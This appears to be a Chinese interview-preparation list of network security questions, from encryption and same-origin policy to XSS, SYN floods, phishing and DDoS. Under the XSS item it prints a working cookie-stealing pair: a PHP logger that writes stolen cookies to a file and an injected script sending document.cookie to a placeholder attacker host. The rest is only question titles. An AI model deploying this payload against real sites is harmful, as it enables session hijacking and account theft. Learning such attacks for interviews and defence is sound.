目录
在面试时,网络安全也会被经常问到,至少要知道常见的攻击,以及防 御措施。在这里 Mark 下,不做深入分析。
1.对称加密和非对称加密
2.什么是同源策略?
3.cookie 存在哪里?可以打开吗?
4.xss 如何盗取 cookie?
攻击者代码:
<?php
$cookie=$_GET['cookie'];
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$cookietxt=fopen('cookie.txt','a');
fwrite($cookietxt,"time:".$time." cookie:".$cookie."
referer:".$referer.""); 注意双引号,容易出错
fclose($cookietxt);
?>
脚本端:
<script>
document.write('<img
src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0
border=0 />');
</script>
5.xss 有 cookie 一定可以无用户名密码登录吗?
6.xss 如何防御?
7.SYN 攻击原理
8.什么是网络钓鱼?
9.DDOS
10.什么是 CC 攻击?